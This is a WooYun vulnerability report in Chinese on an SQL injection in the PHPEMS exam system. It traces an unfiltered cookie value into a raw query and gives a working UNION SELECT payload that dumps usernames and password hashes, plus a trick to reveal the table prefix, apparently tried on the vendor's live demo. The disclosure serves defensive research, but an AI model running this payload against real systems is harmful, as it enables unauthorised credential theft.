当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081915

漏洞标题:PHPEMS注入一处(Demo测试成功)

相关厂商:PHPEMS

漏洞作者: SLAckEr

提交时间:2014-11-06 15:02

修复时间:2015-02-04 15:04

公开时间:2015-02-04 15:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

过滤不严导致的注入

详细说明:

看文件 /app/exam/app.php 272-286行

public function lesson()
{
$action = $this->ev->url(3);
$page = $this->ev->get('page');
switch($action)
{
case 'ajax':
switch($this->ev->url(4))
{
case 'questions':
$number = $this->ev->get('number');
if(!$number)$number = 1;
$questid = $this->ev->getCookie('questype');
$knowsid = $this->ev->getCookie('knowsid');
$questions = $this->question->getRandQuestionListByKnowid($knowsid,$questid);


跟下getCookie 文件/lib/ev.cls.php 81-85行

public function getCookie($par,$nohead = 0)
{
if(isset($this->cookie[CH.$par]))return $this->cookie[CH.$par];
elseif(isset($this->cookie[$par]) && $nohead)return $this->cookie[$par];
else return false;
}


从cookie中获得参数,这里的knowsid没有处理。
然后带进了这个函数getRandQuestionListByKnowid
跟一下/app/exam/cls/question.cls.php 94-105行

public function getRandQuestionListByKnowid($knowid,$typeid)
{
$data = array('DISTINCT questions.questionid',array('questions','quest2knows'),array("quest2knows.qkknowsid IN ({$knowid})","quest2knows.qktype = 0","quest2knows.qkquestionid = questions.questionid","questions.questiontype = '{$typeid}'","questions.questionstatus = 1"),false,false,false);
$sql = $this->sql->makeSelect($data);
$r = $this->db->fetchAll($sql);
$t = array();
foreach($r as $p)
{
$t[] = $p['questionid'];
}
return $t;
}


注意$data,$knowid没有单引号也没有处理。
再看下makeSelect /lib/sql.cls.php 214-282

public function makeSelect($selectors,$type = 1)
{
if(!is_array($selectors))return false;
$sql = "SELECT ";
if(!$selectors[0])$selectors[0] = "*";
if(is_array($selectors[0]))
{
$sql .= rtrim(implode(',',$selectors[0]),',');
}
else $sql .= $selectors[0];
$sql .= " FROM ";
if(is_array($selectors[1]))
{
$tmp = NULL;
foreach($selectors[1] as $p)
{
if($type)$tmp .= $this->tablepre.$p." AS ".$p.",";
else
$tmp .= $p." AS t ,";
}
$sql .= rtrim($tmp,',');
}
else
{
if($type)$sql .= $this->tablepre.$selectors[1]." AS ".$selectors[1];
else
$sql .= $selectors[1]." AS t";
}
$sql .= " WHERE ";
if(!$selectors[2])$selectors[2] = 1;
if(is_array($selectors[2]))
{
$sql .= rtrim(implode(' AND ',$selectors[2]),'AND ');
}
else $sql .= $selectors[2];
if($selectors[3])
{
$sql .= " GROUP BY ";
if(is_array($selectors[3]))
{
$sql .= rtrim(implode(',',$selectors[3]),',');
}
else $sql .= $selectors[3];
}
if($selectors[4])
{
$sql .= " ORDER BY ";
if(is_array($selectors[4]))
{
$sql .= rtrim(implode(',',$selectors[4]),',');
}
else $sql .= $selectors[4];
}
if($selectors[5])
{
$sql .= " LIMIT ";
if(is_array($selectors[5]))
{
$sql .= rtrim(implode(',',$selectors[5]),',');
}
else $sql .= $selectors[5];
}
elseif($selectors[5] !== false)
{
$sql .= " LIMIT 0,100";
}
return $sql;
}


直接生成select语句的sql,没有处理。这样就导致了注入的产生。

漏洞证明:

利用过程:
首先注册个用户,开一个新考场

1.JPG


是免费的测试的。
然后访问
http://127.0.0.1/phpems_zxmnks_v2.2/index.php?exam-app-lesson-ajax-questions&number=1
抓包

2.png


3.png


输入poc
NULL) union select concat(username,0x23,userpassword) from x2_user #(

4.png


那么如果数据库前缀改掉了肿么办?
http://127.0.0.1/phpems_zxmnks_v2.2/index.php?exam-app-lesson-ajax-questions&number=
直接访问这个就行了,把number参数的值去掉,就可以爆出前缀,。。。。

11.JPG


官网的前缀不是x2,改掉了。通过这个方法爆出,然后上个图。

mask 区域
*****^^*****
*****38e8bc2e36df388e57c2b0.jpg*****


还有问题的函数
getRandQuestionRowsListByKnowid
getKnowsBySubjectAndAreaid
getRandQuestionList
没在仔细看了,睡觉了。。

修复方案:

对cookie传递进来的参数过滤,对带入sql查询的变量从函数上过滤。

版权声明:转载请注明来源 SLAckEr@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论